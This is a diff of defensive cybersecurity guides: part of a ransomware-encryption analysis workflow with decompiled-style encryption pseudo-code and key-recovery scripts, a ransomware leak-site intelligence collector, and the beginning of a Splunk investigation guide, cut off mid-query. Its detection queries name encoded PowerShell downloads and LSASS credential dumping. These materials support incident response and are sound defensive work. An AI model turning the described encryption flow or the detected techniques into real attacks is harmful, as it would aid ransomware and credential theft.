- Reverse engineering ransomware to identify the encryption algorithm, key derivation, and key storage mechanism
|
||||
- Developing a decryptor tool when a weakness in the ransomware's cryptographic implementation is identified
|
||||
- Classifying a ransomware sample by its encryption approach to attribute it to a known family
|
||||
|
||||
**Do not use** for production data recovery operations without first verifying the decryption method on test copies of encrypted files.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra or IDA Pro for reverse engineering the ransomware binary
|
||||
- Python 3.8+ with `pycryptodome` library for testing encryption/decryption routines
|
||||
- Sample encrypted files and their corresponding plaintext originals (known-plaintext pairs)
|
||||
- Access to the ransomware binary (unpacked if applicable)
|
||||
- Familiarity with symmetric (AES, ChaCha20) and asymmetric (RSA) cryptographic algorithms
|
||||
- NoMoreRansom.org database for checking existing free decryptors
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Encryption Algorithm
|
||||
|
||||
Determine which cryptographic algorithm the ransomware uses:
|
||||
|
||||
```python
|
||||
# Check for Windows Crypto API usage in imports
|
||||
import pefile
|
||||
|
||||
pe = pefile.PE("ransomware.exe")
|
||||
|
||||
crypto_apis = {
|
||||
"CryptAcquireContextA": "Windows CryptoAPI",
|
||||
"CryptAcquireContextW": "Windows CryptoAPI",
|
||||
"CryptGenKey": "Windows CryptoAPI key generation",
|
||||
"CryptEncrypt": "Windows CryptoAPI encryption",
|
||||
"CryptImportKey": "Windows CryptoAPI key import",
|
||||
"BCryptOpenAlgorithmProvider": "Windows CNG (modern crypto)",
|
||||
"BCryptEncrypt": "Windows CNG encryption",
|
||||
"BCryptGenerateKeyPair": "Windows CNG asymmetric key gen",
|
||||
}
|
||||
|
||||
print("Crypto API Imports:")
|
||||
for entry in pe.DIRECTORY_ENTRY_IMPORT:
|
||||
for imp in entry.imports:
|
||||
if imp.name and imp.name.decode() in crypto_apis:
|
||||
print(f" {entry.dll.decode()} -> {imp.name.decode()}: {crypto_apis[imp.name.decode()]}")
|
||||
```
|
||||
|
||||
```
|
||||
Common Ransomware Encryption Schemes:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
AES-256-CBC + RSA-2048: Most common hybrid scheme (LockBit, REvil, Conti)
|
||||
AES-256-CTR + RSA-4096: Stream cipher mode variant (BlackCat/ALPHV)
|
||||
ChaCha20 + RSA-4096: Modern stream cipher (Hive, Royal)
|
||||
Salsa20 + ECDH: Curve25519 key exchange (Babuk)
|
||||
AES-128-ECB: Weak mode - potential decryption via known-plaintext
|
||||
XOR-only: Trivial encryption - always recoverable
|
||||
Custom algorithm: Often contains implementation flaws
|
||||
```
|
||||
|
||||
### Step 2: Analyze Key Generation and Management
|
||||
|
||||
Reverse engineer how encryption keys are generated and stored:
|
||||
|
||||
```
|
||||
Key Management Patterns in Ransomware:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
1. STRONG (no recovery possible without key):
|
||||
- Per-file AES key generated with CryptGenRandom
|
||||
- AES key encrypted with embedded RSA public key
|
||||
- Encrypted key appended to each file or stored separately
|
||||
- RSA private key held only by attacker's C2 server
|
||||
|
||||
2. WEAK (potential recovery):
|
||||
- AES key derived from predictable seed (timestamp, PID)
|
||||
- Same AES key used for all files (single key compromise = full recovery)
|
||||
- Key transmitted to C2 before encryption starts (PCAP may contain key)
|
||||
- XOR with short repeating key (brute-forceable)
|
||||
- PRNG seeded with GetTickCount or time() (limited keyspace)
|
||||
|
||||
3. FLAWED IMPLEMENTATION:
|
||||
- ECB mode (preserves plaintext patterns)
|
||||
- Initialization vector (IV) reuse across files
|
||||
- Key stored in plaintext in memory (recoverable from memory dump)
|
||||
- Partial encryption (only first N bytes encrypted)
|
||||
```
|
||||
|
||||
### Step 3: Examine File Encryption Routine
|
||||
|
||||
Reverse engineer the file processing logic:
|
||||
|
||||
```c
|
||||
// Typical ransomware file encryption flow (decompiled pseudo-code from Ghidra):
|
||||
|
||||
void encrypt_file(char *filepath) {
|
||||
// 1. Check file extension against target list
|
||||
if (!is_target_extension(filepath)) return;
|
||||
|
||||
// 2. Generate per-file AES key (32 bytes for AES-256)
|
||||
BYTE aes_key[32];
|
||||
CryptGenRandom(hProv, 32, aes_key);
|
||||
|
||||
// 3. Generate random IV (16 bytes)
|
||||
BYTE iv[16];
|
||||
CryptGenRandom(hProv, 16, iv);
|
||||
|
||||
// 4. Read file contents
|
||||
HANDLE hFile = CreateFile(filepath, GENERIC_READ, ...);
|
||||
BYTE *plaintext = read_entire_file(hFile);
|
||||
|
||||
// 5. Encrypt with AES-256-CBC
|
||||
aes_cbc_encrypt(plaintext, file_size, aes_key, iv);
|
||||
|
||||
// 6. Encrypt AES key with RSA public key
|
||||
BYTE encrypted_key[256]; // RSA-2048 output
|
||||
rsa_encrypt(aes_key, 32, rsa_pubkey, encrypted_key);
|
||||
|
||||
// 7. Write: encrypted_data + encrypted_key + IV to file
|
||||
write_file(filepath, encrypted_data, encrypted_key, iv);
|
||||
|
||||
// 8. Rename file with ransomware extension
|
||||
rename_file(filepath, strcat(filepath, ".locked"));
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: Check for Cryptographic Weaknesses
|
||||
|
||||
Test the implementation for exploitable flaws:
|
||||
|
||||
```python
|
||||
from Crypto.Cipher import AES
|
||||
import os
|
||||
import struct
|
||||
|
||||
# Test 1: Check if same key is used for multiple files
|
||||
# Compare encrypted versions of known files
|
||||
def check_key_reuse(file1_enc, file2_enc):
|
||||
with open(file1_enc, "rb") as f:
|
||||
data1 = f.read()
|
||||
with open(file2_enc, "rb") as f:
|
||||
data2 = f.read()
|
||||
|
||||
# Extract IVs (location depends on ransomware family)
|
||||
# If IVs are same and files share encrypted blocks -> same key
|
||||
iv1 = data1[-16:] # Example: IV at end
|
||||
iv2 = data2[-16:]
|
||||
if iv1 == iv2:
|
||||
print("[!] Same IV detected - key reuse likely")
|
||||
|
||||
# Test 2: Check for predictable key derivation
|
||||
# If key is derived from timestamp, iterate possible values
|
||||
def brute_force_timestamp_key(encrypted_file, known_header, timestamp_range):
|
||||
with open(encrypted_file, "rb") as f:
|
||||
encrypted_data = f.read()
|
||||
|
||||
for ts in timestamp_range:
|
||||
# Derive key the same way ransomware does
|
||||
import hashlib
|
||||
key = hashlib.sha256(str(ts).encode()).digest()
|
||||
iv = encrypted_data[-16:]
|
||||
cipher = AES.new(key, AES.MODE_CBC, iv)
|
||||
decrypted = cipher.decrypt(encrypted_data[:16])
|
||||
|
||||
if decrypted[:len(known_header)] == known_header:
|
||||
print(f"[!] Key found! Timestamp: {ts}")
|
||||
return key
|
||||
|
||||
return None
|
||||
|
||||
# Test 3: Check for ECB mode (pattern preservation)
|
||||
def check_ecb_mode(encrypted_file):
|
||||
with open(encrypted_file, "rb") as f:
|
||||
data = f.read()
|
||||
# ECB produces identical ciphertext for identical plaintext blocks
|
||||
blocks = [data[i:i+16] for i in range(0, len(data), 16)]
|
||||
unique = len(set(blocks))
|
||||
total = len(blocks)
|
||||
if unique < total * 0.95:
|
||||
print(f"[!] ECB mode likely: {total-unique} duplicate blocks out of {total}")
|
||||
```
|
||||
|
||||
### Step 5: Attempt Key Recovery
|
||||
|
||||
Use identified weaknesses for key recovery:
|
||||
|
||||
```python
|
||||
# Recovery Method 1: Extract key from memory dump
|
||||
# Volatility plugin to scan for AES key schedules
|
||||
# vol3 -f memory.dmp windows.yarascan --yara-rule "aes_key_schedule"
|
||||
|
||||
# Recovery Method 2: Known-plaintext attack (weak algorithms)
|
||||
def xor_key_recovery(encrypted_file, known_plaintext):
|
||||
"""Recover XOR key from known plaintext-ciphertext pair"""
|
||||
with open(encrypted_file, "rb") as f:
|
||||
ciphertext = f.read()
|
||||
|
||||
key = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
|
||||
# Find repeating key length
|
||||
for key_len in range(1, 256):
|
||||
candidate = key[:key_len]
|
||||
if all(key[i] == candidate[i % key_len] for i in range(min(len(key), key_len * 4))):
|
||||
print(f"XOR key (length {key_len}): {candidate.hex()}")
|
||||
return candidate
|
||||
return None
|
||||
|
||||
# Recovery Method 3: Check NoMoreRansom for existing decryptors
|
||||
# https://www.nomoreransom.org/en/decryption-tools.html
|
||||
```
|
||||
|
||||
### Step 6: Document Encryption Analysis
|
||||
|
||||
Compile findings into a structured report:
|
||||
|
||||
```
|
||||
Analysis should document:
|
||||
- Algorithm identified (AES, RSA, ChaCha20, custom)
|
||||
- Key size and mode of operation (CBC, CTR, ECB, GCM)
|
||||
- Key generation method (CSPRNG, predictable seed, static key)
|
||||
- Key storage location (appended to file, registry, C2 transmission)
|
||||
- File modification pattern (full encryption, partial, header-only)
|
||||
- Targeted file extensions
|
||||
- Ransom note format and payment infrastructure
|
||||
- Decryption feasibility assessment (possible/impossible/partial)
|
||||
- Recommended recovery approach
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Hybrid Encryption** | Combining symmetric (AES) for fast file encryption with asymmetric (RSA) for secure key wrapping; the standard ransomware approach |
|
||||
| **Key Wrapping** | Encrypting the per-file symmetric key with the attacker's RSA public key so only the attacker's private key can decrypt it |
|
||||
| **ECB Mode** | Electronic Codebook mode encrypts each block independently; preserves patterns in plaintext, a critical weakness enabling partial recovery |
|
||||
| **Known-Plaintext Attack** | Using a known original file and its encrypted version to derive the encryption key; effective against XOR and weak stream ciphers |
|
||||
| **Key Schedule** | The expanded form of an AES key in memory; scannable in memory dumps to recover encryption keys before they are erased |
|
||||
| **CSPRNG** | Cryptographically Secure Pseudo-Random Number Generator; ransomware using CryptGenRandom produces unpredictable keys |
|
||||
| **Partial Encryption** | Some ransomware only encrypts the first N bytes or every Nth block for speed; unencrypted portions may aid recovery |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Ghidra**: Reverse engineering suite for analyzing ransomware encryption routines at the assembly level
|
||||
- **PyCryptodome**: Python cryptographic library for implementing and testing decryption routines
|
||||
- **NoMoreRansom.org**: Free decryption tool repository maintained by Europol and security vendors for known ransomware families
|
||||
- **Volatility**: Memory forensics framework for extracting encryption keys from RAM dumps of infected systems
|
||||
- **CryptoTester**: Tool for identifying cryptographic algorithms based on constants and code patterns
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Assessing Decryption Feasibility for a Ransomware Incident
|
||||
|
||||
**Context**: An organization is hit with ransomware encrypting file servers. Management needs to know if decryption is possible without paying the ransom before making a recovery decision.
|
||||
|
||||
**Approach**:
|
||||
1. Identify the ransomware family from ransom note, file extension, and sample hash (check ID Ransomware)
|
||||
2. Check NoMoreRansom.org for existing free decryptors for this family
|
||||
3. Reverse engineer the encryption routine in Ghidra to identify the algorithm and key management
|
||||
4. Test for implementation weaknesses (key reuse, predictable seeds, ECB mode)
|
||||
5. Check if PCAP from the incident captured the key transmission to C2 (if key was sent before encryption)
|
||||
6. Scan memory dumps from affected machines for AES key schedules in RAM
|
||||
7. Report findings: decryption possible/impossible with specific technical justification
|
||||
|
||||
**Pitfalls**:
|
||||
- Testing decryption methods on the only copy of encrypted files (always work on copies)
|
||||
- Assuming all files use the same key without verifying (some ransomware uses per-file keys)
|
||||
- Not checking for volume shadow copies (vssadmin) which ransomware may have failed to delete
|
||||
- Confusing the file encryption algorithm with the key wrapping algorithm in reports
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
RANSOMWARE ENCRYPTION ANALYSIS
|
||||
================================
|
||||
Sample: lockbit3.exe
|
||||
Family: LockBit 3.0 / LockBit Black
|
||||
SHA-256: abc123def456...
|
||||
|
||||
ENCRYPTION SCHEME
|
||||
File Cipher: AES-256-CTR (per-file unique key)
|
||||
Key Wrapping: RSA-2048 (public key embedded in binary)
|
||||
Key Generation: CryptGenRandom (CSPRNG - unpredictable)
|
||||
IV Generation: Random 16 bytes per file
|
||||
File Structure: [encrypted_data][rsa_encrypted_key(256B)][iv(16B)][magic(8B)]
|
||||
|
||||
TARGETED EXTENSIONS
|
||||
Total: 412 extensions targeted
|
||||
Categories: Documents (.doc, .xls, .pdf), Databases (.sql, .mdb),
|
||||
Archives (.zip, .7z), Source code (.py, .java, .cs)
|
||||
Excluded: .exe, .dll, .sys, .lnk (system files preserved)
|
||||
|
||||
IMPLEMENTATION ANALYSIS
|
||||
Key Strength: STRONG - per-file random keys, no reuse
|
||||
Mode Security: STRONG - CTR mode with unique nonces
|
||||
Key Storage: RSA-encrypted key appended to each file
|
||||
Shadow Copies: Deleted via vssadmin and WMI
|
||||
|
||||
DECRYPTION FEASIBILITY
|
||||
Without Key: NOT POSSIBLE
|
||||
- No implementation flaws identified
|
||||
- RSA-2048 key wrapping prevents brute force
|
||||
- CSPRNG prevents key prediction
|
||||
- No existing free decryptor available
|
||||
|
||||
RECOVERY OPTIONS
|
||||
1. Restore from offline backups (recommended)
|
||||
2. Check for volume shadow copies (low probability - ransomware deletes them)
|
||||
3. Memory forensics if machine was not rebooted (key may persist in RAM)
|
||||
4. Negotiate with attacker (last resort - no guarantee of decryption)
|
||||
```
|
||||
@@ -0,0 +1,316 @@
|
||||
---
|
||||
name: analyzing-ransomware-leak-site-intelligence
|
||||
description: Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence on group tactics, and assess sector-specific ransomware risk for proactive defense.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [ransomware, leak-site, data-leak, extortion, threat-intelligence, monitoring, dls, victim-tracking]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Ransomware Leak Site Intelligence
|
||||
|
||||
## Overview
|
||||
|
||||
Ransomware groups operating under double-extortion models maintain data leak sites (DLS) on Tor hidden services where they post victim names, stolen data samples, and countdown timers to pressure payment. In H1 2025, 96 unique ransomware groups were active, listing approximately 535 victims per month. Monitoring these sites provides intelligence on active threat groups, targeted sectors, geographic patterns, and emerging ransomware families. This skill covers safely collecting DLS intelligence, extracting structured data, tracking group activity trends, and producing sector-specific risk assessments.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `requests`, `beautifulsoup4`, `pandas`, `matplotlib` libraries
|
||||
- Tor proxy (SOCKS5) for accessing .onion sites or commercial DLS monitoring feeds
|
||||
- Understanding of ransomware double-extortion business model
|
||||
- Familiarity with major ransomware families (Qilin, Akira, LockBit, BlackCat, Clop)
|
||||
- Access to ransomware tracking feeds (Ransomwatch, RansomLook, DarkFeed)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Double Extortion Model
|
||||
|
||||
Modern ransomware groups encrypt victim data AND exfiltrate it before encryption. Leak sites serve as public pressure: victims are listed with a countdown timer, partial data samples, and file trees. If ransom is not paid, full data is published. Some groups have moved to triple extortion, adding DDoS threats or contacting victims' customers directly.
|
||||
|
||||
### DLS Intelligence Value
|
||||
|
||||
Leak sites provide: victim identification (company name, sector, country), attack timeline (when listed, deadline, data published), data volume estimates, group capability assessment (sectors targeted, attack frequency, operational tempo), and trend analysis (new groups emerging, groups rebranding, law enforcement takedowns).
|
||||
|
||||
### Safe Collection Practices
|
||||
|
||||
Never directly access DLS sites in a production environment. Use purpose-built monitoring services (Ransomwatch, DarkFeed, KELA, Flashpoint), Tor-isolated research VMs, commercial threat intelligence platforms, or community-maintained datasets. All analysis should be conducted in isolated environments with proper authorization.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Ingest Ransomware Leak Site Data from Public Feeds
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
import pandas as pd
|
||||
from datetime import datetime, timedelta
|
||||
from collections import Counter
|
||||
|
||||
class RansomwareIntelCollector:
|
||||
"""Collect ransomware DLS intelligence from public tracking sources."""
|
||||
|
||||
RANSOMWATCH_API = "https://raw.githubusercontent.com/joshhighet/ransomwatch/main/posts.json"
|
||||
RANSOMWATCH_GROUPS = "https://raw.githubusercontent.com/joshhighet/ransomwatch/main/groups.json"
|
||||
|
||||
def __init__(self):
|
||||
self.posts = []
|
||||
self.groups = []
|
||||
|
||||
def fetch_ransomwatch_data(self):
|
||||
"""Fetch ransomware victim posts from ransomwatch."""
|
||||
resp = requests.get(self.RANSOMWATCH_API, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
self.posts = resp.json()
|
||||
print(f"[+] Loaded {len(self.posts)} victim posts from ransomwatch")
|
||||
else:
|
||||
print(f"[-] Failed to fetch posts: {resp.status_code}")
|
||||
|
||||
resp = requests.get(self.RANSOMWATCH_GROUPS, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
self.groups = resp.json()
|
||||
print(f"[+] Loaded {len(self.groups)} ransomware group profiles")
|
||||
|
||||
return self.posts
|
||||
|
||||
def get_recent_victims(self, days=30):
|
||||
"""Get victims posted in the last N days."""
|
||||
cutoff = datetime.now() - timedelta(days=days)
|
||||
recent = []
|
||||
for post in self.posts:
|
||||
try:
|
||||
discovered = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
if discovered.replace(tzinfo=None) >= cutoff:
|
||||
recent.append(post)
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
print(f"[+] {len(recent)} victims in last {days} days")
|
||||
return recent
|
||||
|
||||
def get_group_activity(self, group_name):
|
||||
"""Get all posts by a specific ransomware group."""
|
||||
group_posts = [
|
||||
p for p in self.posts
|
||||
if p.get("group_name", "").lower() == group_name.lower()
|
||||
]
|
||||
print(f"[+] {group_name}: {len(group_posts)} total victims")
|
||||
return group_posts
|
||||
|
||||
collector = RansomwareIntelCollector()
|
||||
collector.fetch_ransomwatch_data()
|
||||
recent = collector.get_recent_victims(days=30)
|
||||
```
|
||||
|
||||
### Step 2: Analyze Group Activity and Trends
|
||||
|
||||
```python
|
||||
def analyze_group_trends(posts, top_n=15):
|
||||
"""Analyze ransomware group activity trends."""
|
||||
group_counts = Counter(p.get("group_name", "unknown") for p in posts)
|
||||
monthly_activity = {}
|
||||
|
||||
for post in posts:
|
||||
try:
|
||||
date = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
month_key = date.strftime("%Y-%m")
|
||||
group = post.get("group_name", "unknown")
|
||||
if month_key not in monthly_activity:
|
||||
monthly_activity[month_key] = Counter()
|
||||
monthly_activity[month_key][group] += 1
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
|
||||
analysis = {
|
||||
"total_posts": len(posts),
|
||||
"unique_groups": len(group_counts),
|
||||
"top_groups": group_counts.most_common(top_n),
|
||||
"monthly_totals": {
|
||||
month: sum(counts.values())
|
||||
for month, counts in sorted(monthly_activity.items())
|
||||
},
|
||||
"monthly_top_groups": {
|
||||
month: counts.most_common(5)
|
||||
for month, counts in sorted(monthly_activity.items())
|
||||
},
|
||||
}
|
||||
|
||||
print(f"\n=== Ransomware Group Activity ===")
|
||||
print(f"Total victims tracked: {analysis['total_posts']}")
|
||||
print(f"Active groups: {analysis['unique_groups']}")
|
||||
print(f"\nTop {top_n} Groups:")
|
||||
for group, count in analysis["top_groups"]:
|
||||
print(f" {group}: {count} victims")
|
||||
|
||||
return analysis
|
||||
|
||||
trends = analyze_group_trends(collector.posts)
|
||||
```
|
||||
|
||||
### Step 3: Sector and Geographic Risk Assessment
|
||||
|
||||
```python
|
||||
def assess_sector_risk(posts, target_sector=None, target_country=None):
|
||||
"""Assess ransomware risk for specific sector or geography."""
|
||||
sector_data = {}
|
||||
country_data = {}
|
||||
|
||||
for post in posts:
|
||||
# Extract sector if available (not all feeds include this)
|
||||
sector = post.get("sector", post.get("industry", "unknown"))
|
||||
country = post.get("country", "unknown")
|
||||
|
||||
if sector not in sector_data:
|
||||
sector_data[sector] = {"count": 0, "groups": Counter(), "recent": []}
|
||||
sector_data[sector]["count"] += 1
|
||||
sector_data[sector]["groups"][post.get("group_name", "")] += 1
|
||||
|
||||
if country not in country_data:
|
||||
country_data[country] = {"count": 0, "groups": Counter()}
|
||||
country_data[country]["count"] += 1
|
||||
country_data[country]["groups"][post.get("group_name", "")] += 1
|
||||
|
||||
# Sector risk scoring
|
||||
total = len(posts)
|
||||
risk_assessment = {
|
||||
"total_victims": total,
|
||||
"sectors": {},
|
||||
"countries": {},
|
||||
}
|
||||
|
||||
for sector, data in sorted(sector_data.items(), key=lambda x: -x[1]["count"]):
|
||||
pct = (data["count"] / total * 100) if total > 0 else 0
|
||||
risk_assessment["sectors"][sector] = {
|
||||
"victim_count": data["count"],
|
||||
"percentage": round(pct, 1),
|
||||
"top_groups": data["groups"].most_common(5),
|
||||
"risk_level": (
|
||||
"critical" if pct > 15
|
||||
else "high" if pct > 8
|
||||
else "medium" if pct > 3
|
||||
else "low"
|
||||
),
|
||||
}
|
||||
|
||||
for country, data in sorted(country_data.items(), key=lambda x: -x[1]["count"]):
|
||||
pct = (data["count"] / total * 100) if total > 0 else 0
|
||||
risk_assessment["countries"][country] = {
|
||||
"victim_count": data["count"],
|
||||
"percentage": round(pct, 1),
|
||||
"top_groups": data["groups"].most_common(5),
|
||||
}
|
||||
|
||||
return risk_assessment
|
||||
|
||||
risk = assess_sector_risk(collector.posts)
|
||||
```
|
||||
|
||||
### Step 4: Track Emerging and Rebranding Groups
|
||||
|
||||
```python
|
||||
def track_new_groups(posts, lookback_days=90):
|
||||
"""Identify newly emerged ransomware groups."""
|
||||
group_first_seen = {}
|
||||
for post in posts:
|
||||
group = post.get("group_name", "")
|
||||
try:
|
||||
date = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
if group not in group_first_seen or date < group_first_seen[group]["first_seen"]:
|
||||
group_first_seen[group] = {
|
||||
"first_seen": date,
|
||||
"first_victim": post.get("post_title", ""),
|
||||
}
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
|
||||
cutoff = datetime.now() - timedelta(days=lookback_days)
|
||||
new_groups = {
|
||||
group: info for group, info in group_first_seen.items()
|
||||
if info["first_seen"].replace(tzinfo=None) >= cutoff
|
||||
}
|
||||
|
||||
# Count total victims per new group
|
||||
for group in new_groups:
|
||||
victims = [p for p in posts if p.get("group_name") == group]
|
||||
new_groups[group]["total_victims"] = len(victims)
|
||||
new_groups[group]["avg_per_month"] = round(
|
||||
len(victims) / max(1, lookback_days / 30), 1
|
||||
)
|
||||
|
||||
print(f"\n=== New Groups (last {lookback_days} days) ===")
|
||||
for group, info in sorted(new_groups.items(), key=lambda x: -x[1]["total_victims"]):
|
||||
print(f" {group}: {info['total_victims']} victims, "
|
||||
f"first seen {info['first_seen'].strftime('%Y-%m-%d')}")
|
||||
|
||||
return new_groups
|
||||
|
||||
new_groups = track_new_groups(collector.posts, lookback_days=90)
|
||||
```
|
||||
|
||||
### Step 5: Generate Intelligence Report
|
||||
|
||||
```python
|
||||
def generate_ransomware_intel_report(trends, risk, new_groups):
|
||||
"""Generate ransomware threat intelligence report."""
|
||||
report = f"""# Ransomware Threat Intelligence Report
|
||||
Generated: {datetime.now().isoformat()}
|
||||
|
||||
## Executive Summary
|
||||
- **Total victims tracked**: {trends['total_posts']}
|
||||
- **Active ransomware groups**: {trends['unique_groups']}
|
||||
- **New groups (last 90 days)**: {len(new_groups)}
|
||||
|
||||
## Top Active Groups
|
||||
| Rank | Group | Victims |
|
||||
|------|-------|---------|
|
||||
"""
|
||||
for i, (group, count) in enumerate(trends["top_groups"][:10], 1):
|
||||
report += f"| {i} | {group} | {count} |\n"
|
||||
|
||||
report += "\n## New Emerging Groups\n"
|
||||
for group, info in sorted(new_groups.items(), key=lambda x: -x[1]["total_victims"])[:10]:
|
||||
report += f"- **{group}**: {info['total_victims']} victims since {info['first_seen'].strftime('%Y-%m-%d')}\n"
|
||||
|
||||
report += "\n## Sector Risk Assessment\n"
|
||||
report += "| Sector | Victims | % | Risk Level |\n|--------|---------|---|------------|\n"
|
||||
for sector, data in list(risk["sectors"].items())[:10]:
|
||||
report += f"| {sector} | {data['victim_count']} | {data['percentage']}% | {data['risk_level'].upper()} |\n"
|
||||
|
||||
report += """
|
||||
## Recommendations
|
||||
1. Monitor DLS feeds daily for your organization and supply chain partners
|
||||
2. Prioritize patching vulnerabilities exploited by top active groups
|
||||
3. Implement offline backup strategy to reduce extortion leverage
|
||||
4. Conduct tabletop exercises for ransomware scenario response
|
||||
5. Share indicators with sector ISACs and threat sharing communities
|
||||
"""
|
||||
with open("ransomware_intel_report.md", "w") as f:
|
||||
f.write(report)
|
||||
print("[+] Report saved: ransomware_intel_report.md")
|
||||
return report
|
||||
|
||||
generate_ransomware_intel_report(trends, risk, new_groups)
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Ransomware victim data ingested from public tracking feeds
|
||||
- Group activity trends analyzed with monthly breakdowns
|
||||
- Sector and geographic risk assessment produced
|
||||
- New and emerging groups identified with activity metrics
|
||||
- Intelligence report generated with actionable recommendations
|
||||
- All collection conducted through authorized public sources
|
||||
|
||||
## References
|
||||
|
||||
- [Ransomwatch GitHub](https://github.com/joshhighet/ransomwatch)
|
||||
- [SOCRadar: Top Ransomware Statistics 2025](https://socradar.io/blog/top-20-ransomware-statistics-to-know-2025/)
|
||||
- [Bitsight: Ransomware & Deep Web Trends](https://www.bitsight.com/underground/ransomware)
|
||||
- [Sophos: Threat Intelligence Report 2025](https://www.sophos.com/en-us/blog/threat-intelligence-executive-report-volume-2025-number-6)
|
||||
- [H-ISAC: Ransomware Data Leak Sites Report](https://www.aha.org/h-isac-green-reports/2025-08-26-h-isac-tlp-ransomware-data-leak-sites-report-august-26-2025)
|
||||
- [CYFIRMA: Weekly Intelligence Reports](https://www.cyfirma.com/news/weekly-intelligence-report-16-january-2026/)
|
||||
@@ -0,0 +1,238 @@
|
||||
---
|
||||
name: analyzing-security-logs-with-splunk
|
||||
description: >
|
||||
Leverages Splunk Enterprise Security and SPL (Search Processing Language) to
|
||||
investigate security incidents through log correlation, timeline reconstruction,
|
||||
and anomaly detection. Covers Windows event logs, firewall logs, proxy logs, and
|
||||
authentication data analysis. Activates for requests involving Splunk investigation,
|
||||
SPL queries, SIEM log analysis, security event correlation, or log-based incident
|
||||
investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [splunk, SPL, SIEM, log-analysis, security-monitoring]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Security Logs with Splunk
|
||||
|
||||
## When to Use
|
||||
|
||||
- Investigating a security incident that requires correlation across multiple log sources
|
||||
- Hunting for adversary activity using known TTPs and IOCs
|
||||
- Building detection rules for specific attack patterns
|
||||
- Reconstructing an incident timeline from disparate log sources
|
||||
- Analyzing authentication anomalies, lateral movement, or data exfiltration patterns
|
||||
|
||||
**Do not use** for real-time packet-level analysis; use Wireshark or Zeek for full packet capture analysis.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Splunk Enterprise or Splunk Cloud with Enterprise Security (ES) app installed
|
||||
- Log sources ingested: Windows Event Logs (via Splunk Universal Forwarder or WEF), firewall, proxy, DNS, EDR, email gateway
|
||||
- Splunk CIM (Common Information Model) data models configured for normalized field names
|
||||
- SPL proficiency at intermediate level or higher
|
||||
- Role-based access with `search` and `accelerate_search` capabilities in Splunk
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Scope the Investigation in Splunk
|
||||
|
||||
Define search parameters based on incident triage data:
|
||||
|
||||
```spl
|
||||
| Set initial investigation scope
|
||||
index=windows OR index=firewall OR index=proxy
|
||||
earliest="2025-11-14T00:00:00" latest="2025-11-16T00:00:00"
|
||||
(host="WKSTN-042" OR src_ip="10.1.5.42" OR user="jsmith")
|
||||
| stats count by index, sourcetype, host
|
||||
| sort -count
|
||||
```
|
||||
|
||||
This query establishes which log sources contain relevant data for the investigation timeframe and affected assets.
|
||||
|
||||
### Step 2: Analyze Authentication Events
|
||||
|
||||
Investigate suspicious authentication patterns using Windows Security Event Logs:
|
||||
|
||||
```spl
|
||||
| Detect brute force and credential stuffing
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4625
|
||||
earliest=-24h
|
||||
| stats count as failed_attempts, values(src_ip) as source_ips,
|
||||
dc(src_ip) as unique_sources by TargetUserName
|
||||
| where failed_attempts > 10
|
||||
| sort -failed_attempts
|
||||
|
||||
| Detect pass-the-hash (Logon Type 9 - NewCredentials)
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4624
|
||||
Logon_Type=9
|
||||
| table _time, host, TargetUserName, src_ip, LogonProcessName
|
||||
|
||||
| Detect lateral movement via RDP
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4624
|
||||
Logon_Type=10
|
||||
| stats count, values(host) as targets by TargetUserName, src_ip
|
||||
| where count > 3
|
||||
| sort -count
|
||||
```
|
||||
|
||||
### Step 3: Trace Process Execution
|
||||
|
||||
Use Sysmon logs to reconstruct process execution chains:
|
||||
|
||||
```spl
|
||||
| Process creation with parent chain (Sysmon Event ID 1)
|
||||
index=sysmon EventCode=1 host="WKSTN-042"
|
||||
earliest="2025-11-15T14:00:00" latest="2025-11-15T15:00:00"
|
||||
| table _time, ParentImage, ParentCommandLine, Image, CommandLine, User, Hashes
|
||||
| sort _time
|
||||
|
||||
| Detect suspicious PowerShell execution
|
||||
index=sysmon EventCode=1 Image="*\\powershell.exe"
|
||||
(CommandLine="*-enc*" OR CommandLine="*-encodedcommand*"
|
||||
OR CommandLine="*downloadstring*" OR CommandLine="*iex*")
|
||||
| table _time, host, User, ParentImage, CommandLine
|
||||
| sort _time
|
||||
|
||||
| Detect LSASS credential dumping
|
||||
index=sysmon EventCode=10 TargetImage="*\\lsass.exe"
|
||||
GrantedAccess=0x1010
|
||||
